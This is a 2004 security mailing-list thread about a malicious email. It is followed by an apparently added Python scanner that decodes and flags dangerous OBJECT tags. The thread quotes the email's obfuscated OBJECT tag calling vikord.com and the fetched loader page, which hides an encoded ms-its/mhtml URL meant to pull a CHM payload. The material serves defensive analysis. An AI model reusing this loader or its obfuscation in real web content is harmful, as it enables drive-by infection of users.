Network Security Focus-Virus

RE: Virus from vikord.com?

Subject: RE: Virus from vikord.com?
Date: Fri, 27 Aug 2004 17:50:02 -0400
Samuel:

I received the same mail, and I am pretty sure that it is a new kind of
virus.

I sent a copy to Symantec and TrendMicro, but don't have an answer
yet...

Mauricio Fernández S.
IT Manager
FDTA Valles
www.fdta-valles.org
 

-----Original Message-----
From: Mason, Samuel [mailto:smason@state.mt.us] 
Sent: Friday, August 27, 2004 2:05 PM
To: focus-virus@securityfocus.com
Subject: Virus from vikord.com?

Hello all,

I'd like to see who else has run into this problem. 

We had a user receive a mail from what was supposed to be another State
employee. The email had a GIF attachment (2.gif) with the subject line
of "2".

The GIF file was invalid and only contained the characters "45451212"

The HTML in the message included this:

<OBJECT data=http://www.v%69k%6F%72d.com/default.htm>

which resolved to www.vikord.com/default.htm. The site is down with a
"Service Temporarily Unavailable" message due to maintenance or capacity
problems.

I Googled for an answer and got a little info that included this:


Quick snag with wget:

wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50--  http://www.vikord.com/default.htm
           => `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=>                                           ] 350           --.--K/s

14:26:56 (3.34 MB/s) - `default.htm' saved [350]

username@coroner ~ $ cat default.htm
<textarea id="code" style="display:none;">
    <object data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('default.htm'))));
</script>

Which seems to indicate the original intent was to download a CHM file,
correct?

I'd like to know if someone else has seen this. Is this a known virus or
something that I just could not find info for? The website is down,
which is good, but how can we mitigate this on a more permanent basis? Our
workstations indicated that the ActiveX control could not run and the
page would not display properly, but I am concerned that users may have lower
security settings somewhere in the enterprise.

Thanks for any help.


Samuel Mason, CISSP
OCP, Information Technology Services Division
State of Montana
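The two-stage loader quoted above hides its real target twice: the mail's OBJECT tag percent-encodes the host name, and the fetched default.htm keeps the second OBJECT inside a hidden textarea with an HTML-entity/percent-encoded "ms-its:mhtml:" URL that only becomes live once the script rewrites ${PATH} and document.write()s it. The scanner below is an added example, not code from the thread or from either poster: it peels both encoding layers off every OBJECT data= attribute, applies the same ${PATH} substitution the page's script performs, and flags URLs whose scheme is one of the Windows pluggable-protocol handlers (ms-its, its, mk, mhtml). That scheme list, the function names and the reconstructed sample HTML (both stages, rebuilt from the post with the line wrapping removed) are assumptions of this example.

```python
import html
import re
from urllib.parse import unquote

# Schemes this example treats as dangerous in an OBJECT data= attribute.
# ms-its:/its:/mk: reach the HTML Help (ITSS) handler, mhtml: the MHTML
# handler; the list is an assumption of this example, not from the post.
DANGEROUS_SCHEMES = {"ms-its", "its", "mk", "mhtml"}

# Matches <object ... data=VALUE> with double-quoted, single-quoted or
# unquoted values. It also sees tags sitting inside a <textarea>, which is
# exactly where the loader parks its second stage.
OBJECT_DATA_RE = re.compile(
    r'''<object\b[^>]*?\bdata\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''',
    re.IGNORECASE | re.DOTALL,
)

# Stage one: the relevant tag from the mail described in the post
# (reconstructed sample input).
STAGE1_HTML = (
    '<html><body><OBJECT data=http://www.v%69k%6F%72d.com/default.htm>'
    '</OBJECT></body></html>'
)

# Stage two: the default.htm the post fetched with wget, reconstructed
# without the mail client's line wrapping (sample input).
STAGE2_HTML = r'''<textarea id="code" style="display:none;">
    <object data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('default.htm'))));
</script>'''


def deobfuscate(value: str, max_rounds: int = 5) -> str:
    """Undo HTML entities and percent-encoding until the string stops changing.

    Both layers may be stacked (&#109; then %6D...), so iterate instead of
    decoding once; max_rounds bounds pathological input.
    """
    for _ in range(max_rounds):
        decoded = unquote(html.unescape(value))
        if decoded == value:
            break
        value = decoded
    return value


def resolve_path(value: str, page_url: str, filename: str = "default.htm") -> str:
    """Apply the loader's ${PATH} substitution.

    The page's script replaces ${PATH} with location.href truncated before
    'default.htm', i.e. the directory URL the page was served from.
    """
    idx = page_url.find(filename)
    base = page_url[:idx] if idx >= 0 else page_url
    return value.replace("${PATH}", base)


def scheme_of(url: str) -> str:
    """Return the lower-cased scheme of a URL, or '' if it has none."""
    m = re.match(r"\s*([a-zA-Z][a-zA-Z0-9+.\-]*):", url)
    return m.group(1).lower() if m else ""


def scan_html(doc: str, page_url: str) -> list:
    """Report every OBJECT data= target in doc after decoding and ${PATH} expansion."""
    findings = []
    for m in OBJECT_DATA_RE.finditer(doc):
        raw = next(g for g in m.groups() if g is not None)
        decoded = resolve_path(deobfuscate(raw), page_url)
        scheme = scheme_of(decoded)
        findings.append({
            "raw": raw,
            "decoded": decoded,
            "scheme": scheme,
            "dangerous": scheme in DANGEROUS_SCHEMES,
        })
    return findings


if __name__ == "__main__":
    for label, doc, url in (
        ("mail body", STAGE1_HTML, "http://mail.example.invalid/"),
        ("default.htm", STAGE2_HTML, "http://www.vikord.com/default.htm"),
    ):
        for f in scan_html(doc, url):
            flag = "DANGEROUS" if f["dangerous"] else "ok"
            print(f"{label}: {flag} scheme={f['scheme']!r} -> {f['decoded']}")
```

Run against the mail body, the scanner only reports that the percent-encoded host decodes to www.vikord.com; run against the fetched default.htm, it reports the ms-its:mhtml: URL that would pull /default.chm from the same directory as the page, which is the point where a gateway rule should drop the message rather than rely on every workstation's ActiveX settings.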
 

